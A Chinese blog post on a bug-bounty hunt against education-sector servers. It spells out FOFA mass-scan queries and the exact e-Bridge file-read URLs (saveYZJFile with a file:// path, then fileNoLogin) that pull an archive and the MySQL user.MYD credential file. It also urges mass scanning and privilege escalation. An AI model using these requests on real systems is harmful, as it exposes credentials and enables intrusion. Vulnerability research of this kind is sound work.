实战篇——教育src(一)

最近事太多了,没办法文章写的断断续续。已经两周没更新了,本来计划的内容还没有准备。想到之前有粉丝说出一些实战的。那就出些简单的。
今天,我就拿我前几天的案例说说。
首先,我通过FOFA进行批量查询org=“China Education and Research Network Center” && port=“8088”
在这里插入图片描述

然后通过Goby进行测试
在这里插入图片描述
用goby自带poc测试在这里插入图片描述
进一步测试(扩大战果):
访问http://马赛克:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///usr/ebridge&fileExt=txt
获得id:d5782d64b44e4c68999d094a32001c23
在这里插入图片描述
访问http:///马赛克:8088/file/fileNoLogin/d5782d64b44e4c68999d094a32001c23
发现ebridge.tar.gz
访问http:///马赛克:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///usr/ebridge/ebridge.tar.gz&fileExt=txt
获得id:fb5a41d9af304a1b992e175ba68ac4e8
访问http:///马赛克:8088/file/fileNoLogin/fb5a41d9af304a1b992e175ba68ac4e8
下载ebridge.tar.gz
解压发现\ebridge\mysql\data\mysql下存在user.MYD在这里插入图片描述

为防止后期有修改,故访问http://马赛克:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///usr/ebridge/mysql/data/mysql/user.MYD&fileExt=txt
获得id:d1251c6b1c8e4434add56fd6b712be96
访问http://马赛克:8088/file/fileNoLogin/d1251c6b1c8e4434add56fd6b712be96
即可以获得最新user.MYD
在这里插入图片描述
打开获得用户和密码在这里插入图片描述
至此结束。
好,现在我们来总结一下。
首先,我们进行教育src挖掘的时候最好批量扫,因为一个一个的效率不高,我们的目的是积分,最好是批量扫。当然如果你有源码,可以试着找一下通用漏洞。
其次,在我们扫描后发现有自己不知道的漏洞,这时候可以百度一下比如说我们不懂xx漏洞,我们搜一下xx漏洞利用一般都有人写过。
还有,当我们成功复现漏洞后,最好尝试提权扩大战果。值得注意的是,千万不要借此扫内网。扫出事了可别怪我没提醒。
以下是教育src平台的测试规则:在这里插入图片描述
最后,我们提交后别报得积分的希望,多半重复。挖教育src心态必须好,可能你辛辛苦苦挖了半天全是重复的。(我这个就是重复的)
(ps:终于赶了一篇出来,还是求各位看官给点评论和关注)

  • 8
    点赞
  • 36
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值